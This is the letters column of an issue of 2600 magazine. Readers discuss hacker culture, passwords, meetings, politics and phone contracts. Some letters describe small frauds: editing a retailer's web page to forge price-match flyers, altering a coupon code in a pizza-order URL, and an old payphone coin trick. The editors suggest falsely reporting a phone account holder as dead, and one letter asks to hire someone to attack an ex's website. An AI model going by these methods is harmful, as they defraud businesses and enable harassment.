. I love it that your grammar and spelling are pretty much impeccable. It was on sale for $2. But I didn’t dive into the deep end of the pool. guys. I wasn’t thrilled with DR-DOS though. Oh. and it helps to see what kinds of nuts are out there. I can read and write HTML as fast as your mom can write to Uncle Joe. please let me know. where you write. So anyway.THE HACKER DIGEST . I was always buying up old software and even bought a set of disks for DOS 3. it’s entirely possible I’m the only member of this category. Thanks for the great work.1 on it. NNY2600 Dear 2600: OK. after retiring in 1996. though. I used this opportunity to learn even more. Dear 2600: I have been a reader of 2600 going on eight years now and I love the magazine! I was reading through the articles and picking through what I wanted to read first and came across “The Last 1000 feet” by b1tl0ck... Wow. I didn’t feel the need to get that by writing in. I was in heaven with this fancy rig! Anyway. P.. flea markets. I still have a room full of parts and boat anchors. I messed with BASIC way back when. I’m a great grandmother who. is because I never felt “qualified” to do so. “Are you one of those people who read 2600.. I went to the kiddie pool first. “People” is part of the prepositional phrase. I started going to all the computer shows. Since they weren’t.. Even had a Mac in there.. Then I got a Victor 8088 with Windows 1. I am still learning.. then spent three weeks installing it over and over again to experiment with things that can go wrong. I just thought I’d point out a tiny little goof on page 47. Though free to hack. I thought I’d just let you know about another category of readers who can’t resist a good dose of 2600 every three months. I had it installed in one evening. This is something I know a great deal about and I felt I needed to help in some way. It also made it possible to accomplish things anyone else would have refused. he could set up a wireless link with WDS and have 54MBps point to point. It gave me the ability to fix things no one else could. Since I’ve been thrilled with your magazine all along. I’ve been reading 2600 cover-to-cover since 1996. from which I began assembling PCs. If these people had been malicious. despite the nice little side income.. and hamfests (I’m a ham. if you spot any errors in my letter. all very different from each other.200! Remember how much everything cost back then? It was a Pionex with a 540 MB HD and 8 MB RAM. I have been in the wireless network industry for about ten years and I have to say if b1tl0ck purchased two mikrotik rb133s and two rb52h wireless cards (don’t forget the POEs) and 2. we see this whole adventure as a positive step.. keep it coming.0. and then only as a response to your kind invitation to do so in the letters column. but I’m still working on Javascript and PHP. then demanded I install a physical security device on them that wouldn’t fit (Centurion Guard). but as long as I can be in a room with a computer and 2600.

D4vedw1n) using IE 6? The thing is so
231
. rather than to the store. For instance. First. what Sigma did was use Javascript injection to print up a store flyer with an erroneous price. He stuffs it under his mattress because somehow hacking seems naughty. this really is the same thing. I note multiple serious flaws that in my opinion render this article unsuitable for publication: 1. Just open it up. as it claims to be. typically caused by an attacker using an SQL injection (which runs on the server’s database). Dear 2600: I was disappointed by two of the articles in your last issue. If that sounds like bullshit to you. Dear 2600: Hackers have a bad reputation. Chad won’t pick up 2600 for years. We break the “rules” of society. A bunch of bankers didn’t do the right thing. 2600 has responsibility for its content as well. misleading. looking for Playboy (all moms do). and forbids Chad from ever buying this magazine again. as a simple Google or Wikipedia search would have shown. However. Or. Let’s say young Chad picks up this issue as his first 2600 magazine. since he got a $169. reads this random article. 2. He could end up being your computer-clueless boss that doesn’t trust hackers 20 years from now. Lastly. uninformative. Given the margins that online retailers use. Sigma figured out a loophole. Is this the picture we want the world to have of us? The Piano Guy It’s definitely not the picture we want to promote but it is a reality of what some people are doing with technology that needs to be addressed. don’t be smug..99. that type of forgery is harder to pull off. After all. great. It is not Javascript injection. Making mistakes is part of learning. what we do in the world has repercussions. if you’re like Sigma (“Exploiting Price-Matching through Javascript Injection”). What he also did was steal a hard drive for a price that was probably well below wholesale. I optimistically chalk up Sigma’s faults to his being a newbie who just learned about the DOM and is in the process of exploring how it works. Best Buy has the right to keep on their lights and pay their employees. and we use our special skills to do it. That behavior is out and out theft. at least that is what he claims he did. for future price matching. Second. and Chad gets a spanking from dad for trying to sneak something in the house he wasn’t supposed to (moms will tell dads to do that to kids). in this case Sigma was recommending that the reader scam a store for more than half off the lowest competitor’s price. XSS is a kind of Javascript injection payload (which runs on the target user’s browser). both the MPEG-1 Audio Layer II and Waveform audio formats are free and open.THE HACKER DIGEST . In this case. and your staff should have known this and corrected the factual error (especially in an otherwise informative article). While I have no particular attachment to whether something is illegal or not per se (though the described behavior is indeed a misdemeanor in my state). and should exercise better judgment to ensure that it is not printing obviously false. in “Inside Google Radio. i. Mom. Why are any of your article writers (namely. and blatantly unethical information. and if you know that this doesn’t describe you.I particularly enjoyed “ATA Security Exposed. My hope is that he lied to us. P. we just want to get what we want. And yes. it is probable that this degree of markdown actually causes the store to take a loss. Articles like this do describe behaviors that give hackers a bad name. the end. They “got theirs. but there’s a much simpler method that every self-respecting web hacker ought to use: Firebug. as it did in this case. we don’t care who we hurt. There is not nearly that much air in the price of a hard drive. oversimplistic. did something unethical with it. you are completely right on the grammar. but instead did the right thing for their shareholders (in the short term). and by then he may not even be that interested in computers after he’s had that long of a break. Injection is when you get a target process or computer to run your code.” and we’re all paying for it. Not only is counting spans a horrible method to get to a particular one (because the page structure can well change). Or even just save the file and change the source code in any text editor.and that they will encourage more of the same level of quality. I hope that you will continue to print better articles . But. rather than web page printouts. causes actual harm without justification. namely to simply edit the page he was looking at. and stole using his advanced skill to perpetrate the crime.99 hard drive for $59.” hypo claims that MP2 and WAV “are proprietary to Scott Studios/dMarc/Google. It promotes unethical fraud.” “Telecom Informer. and he doesn’t want his mom to know. It’s a crappy way to do what he wanted to do.S.” This is flatly false. finds this instead. and even if there was.VOLUME 26
Thanks for being a true inspiration and for showing just how amazing and unpredictable our audience can be. 3. What we have is a financial crisis. change the field.” and “The Particle” . For those of you who missed that article (new subscribers excused).e. in “Exploiting Price-Matching Through Javascript Injection” by Sigma. He then took that forged page and passed it off as a real advertisement at the competition to get a price match. I can see Best Buy insisting on ads that are offset printed on newsprint. he was simply running Javascript in his own browser. While we are talking about much smaller numbers. Yawn.

such as Senator Dianne Feinstein’s failed attempt to inject anti-neutrality legislature into Obama’s economic stimulus package. I have effected these and other tactics against traffic court in a particularly onerous county in California. But we all know a lot can happen even in a short period of time. After I hit send. do a view code. hence why one barcode at one store may be valid at another by coincidence). Along with the sites listed at the end of my article. change the prices to whatever I want (they’re easy to find). In either case. looks like I subscribed at the right time! Off to learn how to hack a telescope! Don “The Jaded Tech” Dear 2600: In 25:4. saizai Dear 2600: I thoroughly enjoyed Sigma’s article “Exploiting Price-Matching through Javascript Injection” but for those of us less technically inclined. of course. those examples will also probably be old news. XlogicX Dear 2600: There was a lot of time that passed between when I submitted my article. certainly understandable and I would definitely not write to complain about that (2600 is a big magazine that surely gets many article submissions. incompatibilities. and open it in a browser. down to the URL and it has whatever prices I decided to put in it. I save the URL for later use. or Time Warner Cable expanding its test markets for paltry Internet data caps. make that “great”) work! SAR It seems almost unbelievable that something so simple can actually work. And by the time you read this.that I am frankly surprised that any contributor would touch it other than for testing or honeypot purposes.” I made about 30-40 copies (identical barcode) and handed them out at a 2600 meeting (even a special agent has a copy).THE HACKER DIGEST . So I wanted to write this quick note to point readers in the right direction if they want more current net neutrality news (and to apologize that my article was outdated a bit). and my article was a bit dated by events that occurred between the time it was written and the time it was published. especially the early years.on a final note .savetheinternet. I got out of bed and started writing this letter. My goal wasn’t for convenience . After that... This is. especially when technology and/or politics are involved.” and when it was printed. I can’t sleep after reading “An Astronomer’s Perspective on Hacking. This was a godsend.40 hackers actually. Thanks for reading! linear Dear 2600: Just wanted to let you know that I read one of your articles on holding actions. “Network Neutrality Simplified. Oh . I’ll be searching on Kijiji and eBay for a telescope and somehow get that cost past my currently sleeping wife. I made a VIP card with the savings VIP barcode of four of the major grocery stores in our area . Also.all on the same card “for convenience. I copy the save URL into the address line (but don’t actually go there) and then I print the whole shebang. to name a couple. Thank you and keep the good work going. The VIP card project is now Vapor . and to print them all immediately would be impossible).VOLUME 26
full of so many well known security holes.com/blog also offers current headlines and analysis regarding the ongoing saga. then re-save the file. it’s just a different way to do the same thing. I appreciate your help and will sign up for a subscription in a week or so.but to create a “customer” that had spending habits of 40 people . I then go into the saved file. “Hacking for Beer. and other problems . What I get looks like the real McCoy.but here is a link to how far we eventually got with it: http://tinyurl. Alex Dear 2600: Reference page 42 of 25:4. I go to the site in question.” Yimir points out how “savings cards” are being used to datamine its customers and gives an explanation on how to skew their data.” I’ve always kinda wanted a telescope to look at the skies and.that your magazine has documented and warned of in the past . Maybe it was just the sugar in the ginger ale or the handful of Smarties I ate before heading to bed. and CJ Hinke’s.Yimir states that stores may use different formats for their barcodes. you will more often than not find the UPC standard and your barcode starts with a 4 (a 4 start means that the barcode is local to the store. Dear 2600: I really gotta stop reading your magazine before going to bed. There is still lots of work to do. Keep up the good (no. a lot has happened in the fight for network neutrality. and save it to a text file. By the way. I’m slightly puzzled by your. Anyway. stated opinion that incoming calls on a cellphone should be free of
232
. But maybe spreading this around is the only way to alert people to a really big problem that really should have been anticipated a long time ago. here’s another method of printing a page of your choice with whatever prices you’d like (not that I’m recommending cheating the few brick-andmortar stores left). As I’m sure many readers who are familiar with the subject would be all too willing to point out. http://www. We have done some skewing ourselves in Phoenix. We echo the feelings expressed in this and other letters concerning ripping people (and stores) off with this or any other method. nahhh. after reading about the lens hack/viewing the moon in super-mode. there’s a defect in The Best Of 2600: It’s hard to read in the tub! Just kidding! (Like I’d risk my copy?) I love reading it over and over. For grocery stores.com/phxvip.

put your money where your mouth is.you would dial zero and the operator would tell you to place five dollars worth of quarters in the slot. After all. keep up the great work. and offer a tariff which provides zero charges for incoming cellular service. My earliest recollection of “beating the system” way before computers were available was being in a college dorm.” does that have any significance to other hackers. If you wanted to make a long distance call . at what point will the voice quality become equivalent to that of landlines? Something isn’t right when phone calls of 30 years ago sounded dramatically better than those of today. Thanks for your time. but I swear that I have an actual copy. As for our reasoning. Dear 2600: So I wonder does anyone else play online game. my son has been playing a game from EA Games called Battlefield Vietnam. many of you do. If you wish to advise others as to how to structure their tariffs. The habit of charging a bandwidth-consumption call-originator for the full amount of the marginal cost is mere historical accident. I hope this isn’t a stupid question but my technical skills are very few and this is a whole new world to me. too. Lately.. link7373 We’re currently trying to get Kindle to carry 2600 but they’ve been pretty unresponsive to us. I won’t have to wait six months before I can read 2600 again. In other words. if so. obviously it’s better if people buy it since that’s what makes these kinds of projects possible in the first place. I invite you and CJ Hinke to establish your own cellular service. Dear 2600: Love what you guys do and I’ve been a long time subscriber to both the magazine and the Off The Hook podcast. Someone had drilled a tiny hole into the front of a payphone. So. etc. You could use one quarter and keep dropping it into the
Queries
233
. Plus.more hacks out there than you can believe. it seems grossly unfair to charge someone by default for receiving a call which they didn’t initiate. The system in other parts of the world where callers pay a premium for dialing wireless numbers is only slightly fairer. like “Hack The H?” Just a dumb guess. I could always look for a copy on the news stands in Europe and Asia. I purchased it because it’s a lot easier to keep up with my reading if I have my books all on one device. Some program called PunkBuster can find us hackers right away. maybe you’d like to share some pointers. Of course. I got it for my last birthday present from my wife. This game seems to be hack-proof.. rather than having all the actual books in physical form. As for the book. Hope you don’t mind that I downloaded an electronic copy of it. It has no moral force as precedent. We’re looking into all sorts of ways of doing what you want and hopefully something will come of it. you offer no evidence that there is some canonical reason why both beneficiaries of the communications channel should not pay for the costs they cause. Bones122 Dear 2600: Mostly curious about the reasons some of the things were picked for the latest 2600 mag cover (25:4). Dear 2600: I am a new subscriber to 2600. I wonder really is there anyone that has hacked this game and.THE HACKER DIGEST . or on the Trans-Siberian for six days with no access to anything. Ideally. This game is too easy to hack . And we don’t have a problem with what you did as nobody should have to buy the same thing twice. I do want to learn. my question is: do you offer an e-copy of your quarterly magazine? Something as simple as a pdf would do the trick. Nice. Mitch Sometimes a cover is just a cover. We would stick the end of a paper clip in the tiny hole and the coins would make the noise as they dropped through to the coin return. I just recently purchased one of those e-ink eReaders (like a Kindle) and I’m planning a six month trip around the world. The USA is still a fairly free business-enterprise zone. By the way. Life Subscriber We are also free to voice our opinions on what is right and wrong without becoming either a shareholder or a phone company. But thanks for the invite. Is HTH a hacker term? If someone who is very good at writing code signs his letters with “HTH. Thailand is actually also a rather open market. I could then download the latest copy when it comes out and read it while I’m sailing around the Greek islands. I got a copy of your 2600: A Hacker Odyssey off BitTorrent. Why only half an egg carton below the smiley face? What is the smiley face thankful for? What did you hide behind the two bricks on the right? Wouldn’t it more appropriately be called a memory can? Was the picture designed with the stones five high and approximately four long? Was the green leaf above the bar code placed on purpose as the only green leaf (new leaf on the left)? What kind of drink was the green bottle? Would love to understand some insight into any of these subjects. is it really costing more for phone companies to provide access to wireless devices than it does to connect to landlines? And while we’re on the subject of cell phones. I have played War Rock.and these were the days when it cost four or five dollars for a five minute call from coast to coast . you are free to purchase a controlling interest in their stock. eh.VOLUME 26
charge. I might be able to get an electronic version or something. In this day and age. I hope I haven’t embarrassed myself too much. but I figured that since I’m already a subscriber.

We think it’s more likely that this person is referring to “helix-turn-helix.com. it’s longer by nature since it’s a full blown sentence. this certainly pushes me in favor of this place. and it’s easy to remember in the context you’re using it. He could also be making reference to “Highway to Hell. Hacking is about playing around with systems you encounter in your daily life. Dear 2600: I am being bothered by two people.241pizzaordering. Dear 2600: Recently. farooq noor And somehow you heard that we were the people to come to when something like this happens. say you need a new work password for your desktop. I received an error message. How about “Ihatemyjob!”? Even better is “I hate my job!” if spaces are allowed. why not go back to the transaction URL page (using the back button) that inserted my three dollars off coupon (https://www. Dear 2600: Some nights I’m hungrier than others. please hack these id we shall be very thankful to you. HTH could mean “hand to hand” combat which might mean that the person signing his name that way is challenging the reader to a fight. Perhaps this idea would work better securitywise if you thought of something you hated that
was completely unrelated to what you were currently signing into. I did wind up getting the pop discount. Use a sentence! Dan We suspect “Ihatepaypal!” or a variation would be an extremely popular choice on PayPal. I thought. Ashe is not good lady she is money maker and just communication for money after that she use for wrong work. I thought to myself. It’s not a common way of signing a letter. Need a password for a 2600 registration? “Ihate2600!” (not true. as to what “wrong work” consists of. etc. Can you help me? Leonard No. Each coupon had a restriction of only one coupon per transaction. The good old days. Today I was too tired to make my own meal so I turned to the online pizza shop to satisfy my cravings.it’s bulletproof against dictionary attacks. I determined that two similar twin pizzas were around the same price. We could have maybe handled one but you had to go and complicate things.. For example.com coupon) on site provided no information. Little discoveries can provide so much joy. so throw in a random (consistent) number: “Ihatemyjob2!” Think about it . I could have reduced the amount to basically nothing but that wasn’t the point.. but a search on the second pizza site (site:241pizza. Structurally. com. We’ve already got the lowercase. com coupon) netted me a PDF page with three coupons.htm?PRODUCT=C387) and change the coupon code C387 to C396 (the coupon for a discount on pop). it looked as if it were set up to only allow one coupon. though. but it’s simplicity itself. poem. Concerning your mystery letters. there is an easier way: use a sentence! I can’t remember where I first heard this suggestion. Hope this helps. We’re intrigued. with thanks. But I wanted more. That alone is incredible. but it does make the most sense if you think long and hard about it. uppercase. and symbol covered. so I decided to try to add multiple coupons. I wanted the most amount of food for the best possible price. and other interesting ideas. Sometimes a site will require the use of each character type (lowercase. Michael Thanks for the memories. You can pick a sentence that goes with the context where you’re using the password. c1f We all knew he’d come back for you at some point.THE HACKER DIGEST . This pizza chain has a deal on Monday. [deleted]@yahoo.com/ cart. we did a whole lot of research into this and came up with a few possibilities as to just what might be going on. Gotta run. At that point in the day. number. Comparing prices. Each time I attempted this on the ordering form page. Wow. but this is just an example). Why someone would reference it whenever signing their name is a bit of a puzzle. and Wednesday where you can remove three dollars off any order. granted.
Dear 2600: Thanks your website. doing the same thing but changing certain letters to numbers or symbols. with ideas ranging from using the first letter of each word in your favorite song lyric. One of them really interested me. 1970. I decided to put back in the original transaction URL for three dollars off and I noticed each time it was accepting the coupon and removing three dollars. [deleted]@hotmail. Performing a Google site search (site:pizzapizza. So in the end. Tuesday.VOLUME 26
slot until the operator heard five dollars’ worth.” an album and song by AC/DC that somehow still sounds pretty fresh after all these years.. I received a foreign key error and terminating message that the server produced. How about a forum for programming? “Ihateprogramming!” I often use a pattern to make the first part easier to remember: Ihate<insert stuff here>!. I hear the pizza guy knocking at the door.” which is a three-dimensional structural element capable of binding DNA. symbol).
Ideas
Appeals
234
. However. it seems like there have been a lot of articles on how to pick a password. When trying this. Through understanding them you can discover little tricks. uppercase.

One of the first things the Obama administration did was to affirm the Bush administration’s support of immunity for telcos that facilitated the spying of the Bush administration. The power is there now. it is too tempting not to use it. I believe we would be kidding ourselves to assume that Obama’s administration will not continue to use any domestic and international spying powers put forth by the Bush administration.” and you always respond with a statement to the point that the hacker mentality cannot be separated from politics. I hope you can see why I was disturbed at even the smallest intimation that you might be averting your watchful eyes or softening the application of your inquisitive intellect with regards to the new presidential administration simply because this leader flies the flag of a Democrat or because you agree with him ideologically in some areas. AND IN THE PRESENT STATE OF THE WORLD ECONOMY HE TOLD ME THAT’S ALL HE HAS TIME FOR.” if only a little bit.THE HACKER DIGEST .VOLUME 26
Dear 2600: I am writing to say that I was somewhat disturbed by a recent episode of Off The Hook that I heard. No. And that sentiment is the surest way to keep things the way they are. more of a reshuffling of the inmates around the world. BUT AM WILLING TO PART WITH IF YOU CAN PUT ME IN TOUCH WITH SOMEONE WHO CAN HELP ME WITH MY REQUEST. I only ask that you continue your vigilance in watching this administration just as closely as you would any other. much less roll it back. which is almost more dangerous. Bpa Your points are quite sound. a listener and/or reader had commented on how you all appeared to be “gushing” following the inauguration of President Obama. Once power like that is granted to the government. Happy Hacking. So don’t mistake feelings of happiness on the very first day of this change in government as blind subservience to anything that follows.. and I sincerely hope you continue to be honest with yourselves and your readers. Abuses similar to those that occurred at Gitmo will almost undoubtedly continue. even if it’s not as much of a change as we would like. and then Emmanuel admitted to “gushing. From my first reading. This mentality of suspicion of powerful government along with your propagation of all the merits of freedom of knowledge and of being inquisitive is what defines you. Otherwise our negativity will override any points that we want to make and communicate to others. AND AM WILLING TO PAY FOR THE PRIVILEGE OF SENDING HIM A VIRUS OR TWO. this passion struck a chord with me. SINCE AFTER PROPOSING TO ME HE DECIDED THAT MAKING JEWELRY AND MONEY WERE FAR MORE IMPORTANT TO HIM THAN I WAS. AS WELL AS DISABLING HIS WEBSITE. There are always comments on the radio program and in the magazine from people complaining about you being “political. But it’s quite clearly a change from the previous one. the reason I was disturbed to hear this is because when one is “gushing” over someone or something. this is the very last thing I would expect of you at 2600. and all future government administrations will have access to it. quite frankly. a visceral chord as well as an intellectual one that continues to resonate. fearless in the face of mainstream opinion or other powerful forces. I’M WILLING TO PAY A COUPLE OF HUNDRED DOLLARS I CAN ILL AFFORD AT THIS TIME. The reason this disturbed me is not because I disagree with many of Obama’s policies and find them antithetical to freedom and was therefore perturbed to hear your support. It is the independent and free thinkers such as yourselves that keep the door open for free and honest questioning and debate. nor am I surprised at their gross dereliction of their investigative journalistic duties. because at least with Gitmo. there was a symbol. Thank you for being who you are. Dear 2600: HAVING BEEN UNCEREMONIOUSLY DUMPED. that person has a tendency to ignore or be in denial about any faults of that person or thing. Though all of mainstream media has been shamefully activist in favor of Barack Obama. I am not surprised at the love affair the mainstream media has with this administration. I’M NOT A COP/CYBER SURVEILLANCE
235
. The “place where there is no darkness” can never exist without the constant and honest vigilance of the free. We can occasionally be happy without giving up our concerns. many of whom you will not agree with ideologically. or that they will not implement their own laws and programs that further infringe on the privacy and freedom of the American public. We all know that there are going to be problems down the road and many things to disagree with in the new administration. But every now and then it’s important to step away from the eternal vigilance as individuals for the sake of sanity. In this episode. regardless of whether they claim to be on your side or whether you agree with some of their ideologies. And so. I would be surprised and superbly disappointed if you at 2600 abandoned the very core of who you are and did the same. a central point of human rights abuses that the public could focus on. and that we must remain vigilant over our freedoms against the infringement of those in power. The closing of Gitmo was a publicity farce. To not acknowledge this is to imply that real change isn’t realistically possible. AND MAYBE ONE DAY WHEN THINGS GET BETTER HE’LL GET BACK TO ME. simply distributed without a symbolic focal point for the indignant. I WOULD LIKE TO TEACH MY EX A LESSON HE SOON WON’T FORGET. However.. This culture of curiosity of all things and inquisitiveness into gadgets and government alike has had such a great influence on me.

All that said. This could result in other side effects but it has been known to get the phone disconnected quickly with no penalty.. black text for the article titles. It’s just a question of reaching them. they have been printed over black and white photos rather than over white as in all the previous issues that I have read. I love the many articles and hope to be able to order some back issues soon. I thought it sounded right along your lines. So be aware of this. you’ll be able to apply this hacker mindset to almost any situation and. I was hoping this was something you could help me with. So I would like to ask you if you could help me to grow in that community otherwise or help me promote the 2600 in my country. Dear 2600: My name is Tuyishime Aimable. and fountain-style pens with darker ink.VOLUME 26
ANYTHING . it’s actually not just about the technology in the end. I was wondering if there was any way to get out of a Sprint contract. Oh yeah. I find it useful to annotate my copies of 2600 by writing little summaries of each article in the space beside the titles in the TOC and/or by putting stars next to the particularly amazing and useful articles. They’re open
Building the Community
236
. find other like-minded individuals. happy (belated) 25th and keep the awesomesauce flowing! 27B/6 We suggest using bright red stick-on stars to mark articles. and always maintain a level of curiosity. These are available at most office supply stores. every country is different with regards to rules. no matter where you are.something you can help with hopefully. You could also loan out your phone for the remaining months to someone who is willing to pay the monthly rate. Just because you’re far away from us doesn’t mean that you can’t start running your own meetings or events.JUST A GIRL WHO’S HAD HER HEART BROKEN.human or machine . who will share your curiosity and passion. etc.. He’s walking away from quite a catch. Since the fateful 25:3 revision. This is another reassuring fact. you don’t have to live in the Western world or even have access to high tech in order to be part of the hacker community or to spread the enthusiasm of the hacker culture. If you learn to think like a hacker. Since that issue. You will find the hacker community all around you. Dear 2600: I enjoyed the tables of contents more in their pre-25:3 format. It’s about the thought process. But I have a question . There are always other people. warlock There are absolutely no requirements of this sort to attend one of our meetings. as a last ditch attempt. This is true of any authority figure. and how individual thinkers are dealt with. So our advice is to use this distance as an opportunity to start something fresh and to be a real pioneer in your country.THE HACKER DIGEST . keep reading a lot. My question is am I able to attend the meeting in Dublin and what do I bring if I am allowed? Can you tell me a little about what we do at the meetings and what I need? What do I need to bring (laptop. Of course. you can also cut back your plan to the bare minimum so that the amount you spend over the next few months will be less than the penalty. Your purchase agreement does not allow you to mark issues with a pen. While technology is often at the heart of it all. As hackers are almost always heavily involved in freedom of speech issues. Dear 2600: Hiya I’m 15 and love technology and love to talk about it. The problem is that I can’t attend any meeting or any other event because I live very far from you. If that fails. in so doing. Or. the reaction against them can sometimes be a bit heavy handed. though. and shiny happy white space beneath. between. it will make them give you various incentives to stay and these will at least reduce the amount you’re spending each month. Aimable Contrary to popular belief. what is tolerated. If we look back at the really early days in our own country.)? Thanks. and behind. of course.and by constantly experimenting and sharing your findings. I live in Rwanda. I have considered several solutions: white-out. AND IS TRYING TO MAKE THE PAIN OF HER SITUATION LESS UNBEARABLE. where you are and what you have access to will become secondary. Dear 2600: I am a new hacker reader and am enjoying your magazine. Angelique We can’t imagine what this guy was thinking. I write to humbly request that you return to the old format. These all seem kinda inelegant. So make sure you’re familiar with what you’re up against and what you’re willing to fight for. While this won’t get you out of the contract. I like what you are doing. more difficult to write with a pen on a black or gray background. money. By questioning everything . hackers did just fine playing with rotary dial phones and glorified electric typewriters. no question there. Stuck in a contract and wanting an iPhone dawn The best way to deal with this is to make them believe you’re about to change carriers. I joined the 2600 community a few months ago. It is. I am carrying a Treo Centro on the Sprint network right now and the contract is not up until the end of the year. silver markers. with a small picture in the upper right of the TOC. you can also report that the person (you) whose name the phone is in is no longer living.

I don’t know why I didn’t see that sooner (hint: I’m a dolt). We welcome people of all levels of expertise.) Dear 2600: I just got the guidelines auto-reply. If I do this.com. there will always be people who can’t make it to the meeting on a particular day but the first Friday rule has been in effect for over 20 years and it’s reached the stage where it’s factored into people’s schedules before they accept a job offer or complete their class schedule. I no longer hack hardware/code (software engineer now) but enjoy attending mainly because the people are so interesting at these meeting. help those who ask questions. in addition. Palo Alto and Mountain View are the homes of many startups as well as Google. Obviously. so we try to keep it simple by only listing the “first Friday of the month” ones. Lowery Our auto-reply also explains the rationale behind having the meetings on the first Friday of each month. Dear 2600: I recently moved to Amsterdam and was astonished that there is currently no 2600 meeting here. Dear 2600: How can I find a hacker group or convention in South Florida? Joel We’re not aware of any hacker conferences taking place in that part of the country and none of the four 2600 meetings in Florida are in the southern part of the state. might we suggest a free Marketplace ad? You would need to be a subscriber or at least know someone who’s a subscriber who could submit the ad. I’m ready to publicize it. and be ready to explain what we’re all about to those who might not get it right away. we greatly prefer them to those people who believe they know everything. I live in Bakersfield. (In fact. We certainly hope something gets started as a result of your inquiry. about a 60 minute drive from where I plan on setting up the meeting (Mountain View or Palo Alto). California and the closest 2600 meeting is over 100 miles away in Los Angeles. (At least for a few people it’s gotten to that point. and I feel that such a meeting in one of these nearby locations would do quite well to bring people together. Anything that helps to build the community is a good thing. Furthermore. This is why it’s so important to understand what the meetings are really about and to invite people from all circles to join in and make them even better. Dear 2600: First off. would that alternative Friday be acceptable in your opinion? Lowery Having secondary meetings in other places is a great idea.) I’ve been attending 2600 meetings in Ottawa and Toronto for quite a few years now. your idea is still a good one and there are already numerous meetings that have “unofficial” get-togethers in either the same or a different location. What we suggest is that you spread the word at the official meetings and see if you can get some enthusiasm for the alternative ones. However. but I was considering setting it up for the third Friday instead of the first of each month. Anyone interested should contact me through the form on the website: bakersfield2600. so I’m considering organizing meetings here in Bakersfield if there’s enough interest locally.webs. I wanted to congratulate you for making such a great publication available to the public for over 26 years. avoid developing cliques. Jason For those interested in setting up more meetings and reaching out to the 2600 readership in this manner. We hope you find them interesting. It just gets really complicated if we have to keep track of all of these meetings.VOLUME 26
to all ages and there’s no admission fee of any type. the Dublin crowd is a good one. We imagine there are lots of potential areas for meetings but it’s always a challenge to reach out to people when you have yet to meet them. and might put an end to my plans (which isn’t necessarily a bad thing).) All we ask is that you come with an open mind. offer people who can’t get to a meeting in a major city an opportunity to meet other hackers. There will always be those who imagine the meetings exist for the purpose of obtaining illegal information or devices and you may even encounter attendees who believe this and who try to subvert the image of hackers into the mass media definition. peter It’s hard to imagine why there would be no interest. including any security guards who may work in the space you’re meeting in. The reasoning behind this is because there are two great meetings already. including those who believe they know absolutely nothing. while at the same time give those who wouldn’t want to drive into the cities (and deal with parking) or deal with the train schedules (which end before most meetings end). How would I go about starting a meeting here? (I’m not sure there would be any interest. Some meetings have presentations but most are simply gatherings where people talk to a variety of individuals who show up.THE HACKER DIGEST . particularly in a city as individualistic
237
. Having meetings on the same day of the month makes it easy to keep track of and there’s never a question of which day is 2600 Meeting Day. there are two fantastic meetings already in San Jose and San Francisco. That lays out some excellent points. I don’t want to cut into them and make people choose. However. Dear 2600: I am working on starting a 2600 meeting in my local area (Silicon Valley). We understand that once a month often isn’t enough but it’s also good to get to other places and.

how the scaling worked when it got on Slashdot. if there are features that aren’t working properly or things our site should be doing that it isn’t. Canada. Within the NANP system. I know the difference between a hacker and a cracker. It takes a lot of time and determination but sir. The concept of a page that shows a collage of websites a user has visited by digging through their browser’s history is fascinating. We’ve had articles on this subject in the past but are certainly open to printing new ones with updates and additional information. like most other people.S. The topic would be a guide to the North American phone system for newbies. Dear 2600: Sir. com (namely how the browser history sniffing worked. However.” That’s just the (somewhat outdated) method of indicating that you’re dialing outside your area code or making a long distance call. Sir. Dear 2600: I’d like to write about creating web2. Dear 2600: I wanted to add to the advice you wrote in response to dawn’s letter about how to try and get out of her cell phone contract. Having the magazine available usually helps and it’s possible that might be a challenge if no local bookstores are willing to carry it. Dear 2600: I’d like to suggest a topic for an article. Please give attention to my request. We actually have a number of people working to overhaul our site and we’re confident we’ll get there one day.” According to the O’Reilly book Asterisk: The Future of Telephony.VOLUME 26
and creative as Amsterdam. I don’t know from where to start. please tell me from where to start and which courses I should take. My only motivation for doing this is to make the website more reliable. you’re not dialing a country code every time you precede a domestic number with a “one. and easy to use for both the admins and the users. For example. I surf a lot on the net to find the beginning but failed to find a real one. We’re not at all discounting your generous offer but it’s important to realize that such things are more complicated than appear at first glance. and would start by describing the dial plan. My sister recently wanted to switch carriers but had eight or so months left on her contract. That’s really all I know. which includes the U. so she called her carrier to find out what they could do for her. Until then. Someone with more knowledge. and frightening. Those can be considered our three essential ingredients. Any thought on this would be appreciated. The “one” is actually the “country code” where the “country” in question is the NANP (North American Numbering Plan). It would be a boon to everyone who isn’t already a phone phreak. creative. Tech. dialing 011 indicates an international number. I will be very thankful to you. degree. Would something about this be of interest to you? Holden Most certainly. What you do with that knowledge and ability later on is a totally different story. I thought the “one” you dialed before a long distance number was the “long distance access code. I am sorry because I am going to ask you the same question which I think you hear a lot from the basic user: that is. It’s filled with all sorts of fascinating details and trivia. and a bit about the potential privacy concerns). You obviously need to have an interest in the stuff you’re asking questions about. They are distinguished by the familiar three-digit area codes (called NPAs). Travis H. Dear 2600: I am wondering if the staff of 2600 would be interested in having a website designed and implemented using a content management system such as Joomla. It’s a state of mind and you get there by experimenting and asking a whole lot of questions. Being a hacker means to be someone with a strong desire to learn and to innovate. Don’t buy into the hype of hacker versus cracker and the silly colored hat designations. Prateek We get so many requests like this and it’s important to make it clear that hacking isn’t something that is taught like a class.0collage. I am a student and currently pursuing my B. the only reason a meeting isn’t taking place in a major city is simply because nobody has yet taken the time to put one together.. Thanks and keep up the great work! Zach Designing and implementing a site is a single step in a long process as there are countless things that can and will go wrong down the road. The phone network is what inspired a great many hackers to start exploring in the first place. and some Caribbean countries. I would be willing to do all the work for free. accessible. You suggested that she could downgrade her plan. but I wanted to let your readers know just how far you can downgrade.THE HACKER DIGEST . how I can be a hacker. The CSR she spoke with informed her that. I am from India. You need to not be afraid to step out of the rigid confines of rules and see what happens under different conditions. Oftentimes though. and most of what you explain above is accurate. I know that I can’t be hacker just in a night. rather than pay
Ideas on Spreading Knowledge
New Information
238
. pick it up and run from there. we would like to focus our attention on that in the more immediate future. In short. this is mistaken. This is how you dial countries outside the NANP. how I can be a hacker.

He contacted the company about it. K-Max says he only wanted to expose a security flaw in the Telefonica system. ++divide_by_zero It most definitely will be and we’ll be keeping an eye on this. The documentary The Obama Deception. That led to lots of discussions about security. Orkut. It just goes to show that there are interesting hacker cases going on all over the world and we would do well to pay attention to them at least as much as we focus on what’s happening close to home. and whatnot. she could downgrade her plan to an obscenely low-priced (and massively neutered) $10 a month plan instead for the remainder of the contract period. I doubt it anyone is pressing charges on the company.VOLUME 26
